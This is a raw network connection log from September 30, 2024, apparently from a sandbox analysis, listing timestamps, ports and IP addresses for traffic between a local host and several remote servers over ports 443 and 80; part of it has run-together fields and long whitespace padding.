Sep 30, 2024 16:24:08.490437031 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:08.490901947 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:08.491060972 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:08.577837944 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:08.623414040 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:09.371325970 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:09.371468067 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:09.371470928 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:09.371511936 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:09.381414890 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:09.381433964 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:09.381445885 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:09.381484032 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:10.541908026 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:10.541958094 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:10.542018890 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:10.542360067 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:10.542373896 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.022574902 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.022648096 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:11.026921034 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:11.026931047 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.027240038 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.033389091 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:11.079391956 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.831207037 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.831283092 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:11.831487894 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:11.831706047 CEST  49164        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:11.831724882 CEST  443          49164      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:15.225881100 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:15.225922108 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:15.225975037 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:15.226567030 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:15.226584911 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:15.968035936 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:15.968122959 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:15.977278948 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:15.977307081 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:15.977673054 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:15.992444038 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:16.039403915 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:17.178206921 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:17.178301096 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:17.178415060 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:17.230315924 CEST  49165        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:17.230350018 CEST  443          49165      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:17.571749926 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:17.571800947 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:17.571863890 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:17.572181940 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:17.572196960 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.038249016 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.038337946 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.043808937 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.043822050 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.044148922 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.094722986 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.139416933 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.891654968 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.891746044 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.891793013 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.892293930 CEST  49166        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.892316103 CEST  443          49166      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.905395985 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.905447960 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:18.905494928 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.905669928 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:18.905682087 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:19.402367115 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:19.402734995 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:19.402753115 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:19.403413057 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:19.403419971 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:20.269747972 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:20.269882917 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:20.269939899 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:20.270113945 CEST  49167        443        192.168.2.22    104.21.78.54
Sep 30, 2024 16:24:20.270131111 CEST  443          49167      104.21.78.54    192.168.2.22
Sep 30, 2024 16:24:20.319564104 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:20.319610119 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:20.319681883 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:20.320005894 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:20.320019007 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:20.792197943 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:20.792313099 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:20.800836086 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:20.800868988 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:20.804505110 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:20.804510117 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:21.608695030 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:21.608787060 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:21.608880043 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:21.608880043 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:21.609728098 CEST  49168        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:21.609744072 CEST  443          49168      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:21.628755093 CEST  49169        80         192.168.2.22    91.134.96.177
Sep 30, 2024 16:24:21.634310961 CEST  80           49169      91.134.96.177   192.168.2.22
Sep 30, 2024 16:24:21.634495974 CEST  49169        80         192.168.2.22    91.134.96.177
Sep 30, 2024 16:24:21.634495974 CEST  49169        80         192.168.2.22    91.134.96.177
Sep 30, 2024 16:24:21.641230106 CEST  80           49169      91.134.96.177   192.168.2.22
Sep 30, 2024 16:24:22.250706911 CEST  80           49169      91.134.96.177   192.168.2.22
Sep 30, 2024 16:24:22.250788927 CEST  80           49169      91.134.96.177   192.168.2.22
Sep 30, 2024 16:24:22.250802040 CEST  49169        80         192.168.2.22    91.134.96.177
Sep 30, 2024 16:24:22.250824928 CEST  49169        80         192.168.2.22    91.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250837088 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250849009 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250859976 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250870943 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250874996 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250881910 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250886917 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250894070 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250904083 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250905991 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250916958 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250919104 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250927925 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250946999 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250955105 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256484985 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256536007 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256539106 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256577969 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256618023 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337863922 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337886095 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337897062 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337948084 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337960005 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337971926 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337984085 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338012934 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338013887 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338099957 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338110924 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338129997 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338140965 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339104891 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339114904 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339124918 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339134932 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339147091 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339148998 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339162111 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339175940 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339870930 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339881897 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339893103 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339903116 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339916945 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339970112 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340018988 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340090036 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340892076 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340903997 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340914011 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340943098 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340955019 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.341036081 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.341078997 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.343854904 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.343985081 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.409761906 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.409779072 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.409820080 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.422975063 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.422987938 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423036098 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423070908 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423083067 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423093081 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423109055 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423124075 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423353910 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423365116 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423373938 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423522949 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423650980 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423696995 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423707008 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423722029 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423737049 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423748970 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423774958 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423785925 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423796892 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423814058 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423825026 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424422026 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424432993 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424444914 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424474955 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424485922 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424510956 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424521923 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424532890 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424544096 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424552917 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424562931 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424577951 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425301075 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425312042 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425322056 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425338984 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425348997 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425353050 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425359011 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425359964 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425370932 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425376892 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425390959 CEST4916980192.168.2.2291.134.96.177
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 16:24:22.425400972 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.426192045 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426208019 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426219940 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426239967 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.426249981 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.426265955 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426278114 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426289082 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426302910 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.426306963 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.426312923 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.426331043 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.426337957 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.427051067 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.427062035 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.427073002 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.427100897 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.427112103 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.427126884 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.427136898 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.427166939 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.427196026 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.489763021 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.489795923 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.489805937 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.489850998 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.489878893 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.489891052 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.489902973 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.489906073 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.489912987 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.489937067 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.509673119 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.509686947 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.509696007 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.509710073 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.509721041 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.509831905 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.509846926 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.509870052 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510092020 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510102987 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510113001 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510123968 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510133982 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510143995 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510145903 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510154963 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510162115 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510164976 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510175943 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510179996 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510200024 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510211945 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510273933 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510766029 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510807037 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510809898 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510817051 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:22.510838985 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.510849953 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:22.546123028 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:22.546170950 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:22.546233892 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:22.546551943 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:22.546570063 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:23.236712933 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:23.236793995 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:23.238146067 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:23.238164902 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:23.239557981 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:23.239572048 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:24.097691059 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:24.097763062 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:24.097852945 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:24.097853899 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:24.097951889 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:24.097975016 CEST | 443 | 49170 | 172.67.216.244 | 192.168.2.22
Sep 30, 2024 16:24:24.097990036 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:24.098016024 CEST | 49170 | 443 | 192.168.2.22 | 172.67.216.244
Sep 30, 2024 16:24:24.098367929 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:24.108971119 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:24.271703005 CEST | 80 | 49169 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:24.271796942 CEST | 49169 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:26.657133102 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:26.663223982 CEST | 80 | 49171 | 91.134.96.177 | 192.168.2.22
Sep 30, 2024 16:24:26.663295031 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
Sep 30, 2024 16:24:26.663450956 CEST | 49171 | 80 | 192.168.2.22 | 91.134.96.177
